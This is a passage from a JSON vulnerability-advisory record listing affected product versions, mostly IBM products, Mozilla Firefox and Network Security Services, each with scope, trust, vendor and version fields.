}, { "model": "algo one core", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.9" }, { "model": "rational synergy", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1.3" }, { "model": "snapmanager for sharepoint", "scope": "eq", "trust": 0.3, "vendor": "netapp", "version": "0" }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6.0.3" }, { "model": "qradar siem mr2 patch if", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.112" }, { "model": "elastic storage server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.4" }, { "model": "websphere ilog jrules", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "filenet content manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.0" }, { "model": "rational performance tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.26" }, { "model": "storwize", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "v35007.3.0.10" }, { "model": "rlks administration agent", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1.4.4" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.01" }, { "model": "rational software architect", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.2" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.2.1" }, { "model": "network security services", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.3.1" }, { "model": "rational service tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.3" }, { "model": "rational rhapsody design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0" }, { "model": "watson explorer analytical components", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "11.0.0.0" }, { "model": "integration bus", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "7" }, { "model": "firefox esr", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "17.0.11" }, { "model": "flex system en2092 1gb ethernet scalable switch", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.8.13.0" }, { "model": "rational test workbench", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "watson content analytics", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5.0.2" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "17.0.8" }, { "model": "rational test workbench", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.17" }, { "model": "rational software architect realtime edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.3" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.0.18" }, { "model": "rational software architect realtime edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5.3" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.01" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.5" }, { "model": "tivoli storage manager client management services", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.2" }, { "model": "tivoli directory integrator", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "network security services", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.8" }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "rational software architect design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.1" }, { "model": "firefox esr", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "24.0.2" }, { "model": "security network intrusion prevention system gx5208-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.0.6" }, { "model": "network security services", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.12.10" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.7" }, { "model": "rational developer for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.0" }, { "model": "network security services", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.2" }, { "model": "system networking rackswitch g8264", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.11.6.0" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.0" }, { "model": "rational developer for power systems software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.31" }, { "model": "firefox esr", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "31.6" }, { "model": "rational collaborative lifecycle management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1.5" }, { "model": "websphere mq internet pass-thru", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.0.1" }, { "model": "rlks administration agent", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1.4.8" }, { "model": "firefox esr", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "24.8" }, { "model": "elastic storage server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.4" }, { "model": "rational service tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.3.0.1" }, { "model": "rational policy tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "32.0" }, { "model": "security network intrusion prevention system gx5208-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "tivoli system automation application manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "rational synergy", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.6" }, { "model": "spss analytic server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "rational developer for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.5.1" }, { "model": "flex system chassis management module 2pet14c-2.5.5c", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "network security services", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.6.1" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.0.5" }, { "model": "san volume controller", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.4.0.7" }, { "model": "contact optimization", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.2.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "10.0.4" }, { "model": "rational synergy", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.5" }, { "model": "integrated management module ii for flex systems 1aoo70h-5.40", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.6.22" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.0.9" }, { "model": "websphere datapower xc10 appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "rlks administration agent", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1.4.9" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "firefox esr", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "17.0.7" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "datapower gateway", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "6.0.0.18" }, { "model": "sterling external authentication server ifix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.1.803" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.6" }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1" }, { "model": "infosphere streams", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.1" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "0.6.1" }, { "model": "security siteprotector system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.13" }, { "model": "integration bus", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10" }, { "model": "rational requirements composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1" }, { "model": "flex system fabric cn4093 10gb converged scalable switch", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.8.13.0" }, { "model": "security network intrusion prevention system gx7412", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.0.5" }, { "model": "rational method composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.22" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.1" }, { "model": "rational synergy ifix01", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1.4" }, { "model": "system networking rackswitch g8052", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.9.16.0" }, { "model": "cplex enterprise server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "12.5.0.1" }, { "model": "business process manager standard", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "oncommand workflow automation", "scope": "eq", "trust": 0.3, "vendor": "netapp", "version": "0" }, { "model": "security network intrusion prevention system gx5208", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "security network intrusion prevention system gx7800", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "28.0" }, { "model": "network security services", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.12.2" }, { "model": "websphere real time sr7 fp1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3" }, { "model": "infosphere optim query workload tuner for db2 for luw", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1" }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "netapp", "version": "0" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.0.2" }, { "model": "websphere extreme scale", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "gpfs storage server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.1" }, { "model": "rational test workbench", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.7.0.2" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "rational synergy", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.7" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.1" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.6" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35006.4.19" }, { "model": "rational performance tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.25" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.11" }, { "model": "enterprise linux workstation optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "rational software architect design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.6" }, { "model": "network security services", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.13.3" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5.8" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1.1" }, { "model": "tivoli netcool/omnibus", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.02" }, { "model": "spss modeler", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "16.0.0.1" }, { "model": "firefox esr", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "10.0.1" }, { "model": "rational software architect design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.5" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.6" }, { "model": "security network intrusion prevention system gx5008", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "network security services", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.15.3" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.8" }, { "model": "business process manager express", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.0" }, { "model": "sterling control center ifix04", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.4.0.1" }, { "model": "tivoli monitoring", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.3" }, { "model": "infosphere optim query workload tuner for db2 for luw", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.1" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "31.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "1.5.0.4" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "15.0" }, { "model": "tivoli storage manager operations center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.4.1000" }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "rational method composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.1" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "19.0.1" }, { "model": "datapower gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.4" }, { "model": "tivoli directory server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.311" }, { "model": "contact optimization", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1" }, { "model": "rational developer for c/c++", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1.2" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.0" }, { "model": "rational test workbench", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1" }, { "model": "network security services", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.3" }, { "model": "ccr", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.0" }, { "model": "firefox", "scope": "ne", "trust": 0.3, "vendor": "mozilla", "version": "43.0.2" }, { "model": "system networking rackswitch g8124-e", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.11.6.0" }, { "model": "business process manager express", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1" }, { "model": "datapower gateway", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "6.0.1.14" }, { "model": "tivoli netcool configuration manager if", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.0.6003" }, { "model": "business process manager express", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.2" }, { "model": "business process manager advanced", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.1.2" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.2.3" }, { "model": "sterling external authentication server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.1.4" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "business process manager standard", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.3" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.2.0.5" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.1" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.1.0.5" }, { "model": "flex system fabric en4093r 10gb scalable switch", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.8.13.0" }, { "model": "spss modeler fp2 if006", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "16" }, { "model": "datapower gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.0.14" }, { "model": "rational software architect design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.1" }, { "model": "sterling secure proxy ifix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.4.0.66" }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.2" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.11" }, { "model": "business process manager advanced", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.1" }, { "model": "datapower gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.0.12" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "1.5.3" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.6" }, { "model": "watson content analytics", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.6" }, { "model": "watson explorer annotation administration console", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "11.0.0.0" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.03" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.6.15" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "24.0" }, { "model": "rational synergy", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.7" }, { "model": "ftm for cps", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.1.0" }, { "model": "rational performance tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6.0.2" }, { "model": "lotus widget factory", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.0.1" }, { "model": "sterling control center ifix06", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.4.2.1" }, { "model": "tivoli access manager for e-business", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0" }, { "model": "storwize", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "v50007.3.0.10" }, { "model": "tivoli directory server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.0.32" }, { "model": "sterling secure proxy", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.4.1.8" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.14" }, { "model": "sterling secure proxy ifix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.4.2.05" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.13" }, { "model": "jrockit r28.3.8", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "firefox esr", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "17.0.6" }, { "model": "websphere partner gateway enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.1.0.7" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.4.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "18.0" }, { "model": "workload deployer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.11" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37006.2" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "17.0.2" }, { "model": "rational developer for aix and linux", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "spss modeler", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "16.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "5.0.1" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1" }, { "model": "rational synergy ifix01", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.7" }, { "model": "network security services", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.12.7" }, { "model": "1/10gb uplink ethernet switch module", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.8.23.0" }, { "model": "enterprise linux server optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "spss modeler fp3 if025", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "14.2" }, { "model": "datapower gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.0.11" }, { "model": "rational software architect", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5.4" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "0.5" }, { "model": "ccr", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.1" }, { "model": "installation manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.8.4" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "7" }, { "model": "websphere real time sr5", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3" }, { "model": "sterling control center ifix03", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.4.2.1" }, { "model": "infosphere optim query workload tuner for db2 for luw", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.25" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.1" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "30.0" }, { "model": "network security services", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.5" }, { "model": "spss modeler fp1 if021", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "17" }, { "model": "smartcloud entry jre update", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.0.34" }, { "model": "websphere real time sr8 fp10", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.010" }, { "model": "rational method composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.0.1" }, { "model": "security network intrusion prevention system gx5008-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "rational developer for power systems software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.02" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "0.7" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50006.3" }, { "model": "network security services", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.15.3.1" }, { "model": "san volume controller", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.3.0.10" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.4" }, { "model": "storwize", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "v35007.3.0.12" }, { "model": "firefox esr", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "38.5" }, { "model": "rational collaborative lifecycle management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.1" }, { "model": "os image for red hat", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.0.0" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "flashsystem 9848-ac0", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v840" }, { "model": "linux -current", "scope": null, "trust": 0.3, "vendor": "slackware", "version": null }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "28.0.1" }, { "model": "tivoli network manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1" }, { "model": "tivoli storage manager client management service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.4.000" }, { "model": "sterling external authentication server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.1.0" }, { "model": "rational software architect for websphere software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35006.2" }, { "model": "rational test workbench", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "rational policy tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.5" }, { "model": "image construction and composition tool", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.2.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "25.0.1" }, { "model": "security access manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "29.0" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "6" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50006.2" }, { "model": "sterling control center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.1" }, { "model": "b2b advanced communications", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.0.3" }, { "model": "network security services", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.6" }, { "model": "rational publishing engine", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.1" }, { "model": "rational collaborative lifecycle management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1.4" }, { "model": "storwize", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "v70007.3.0.10" }, { "model": "decision optimization center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.6" }, { "model": "websphere message broker", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8" }, { "model": "security network intrusion prevention system gx4002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "websphere partner gateway advanced edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.1.2" }, { "model": "firefox esr", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "31.3" }, { "model": "rational synergy", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.5" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5.1" }, { "model": "sterling external authentication server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.1.10" }, { "model": "control center 6.0.0.0ifix03", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "san volume controller", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.5.0.6" }, { "model": "workload deployer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.12" }, { "model": "sterling control center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.4.1.0" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.6.8" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.5" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.16" }, { "model": "business process manager express", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.1" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "cognos business 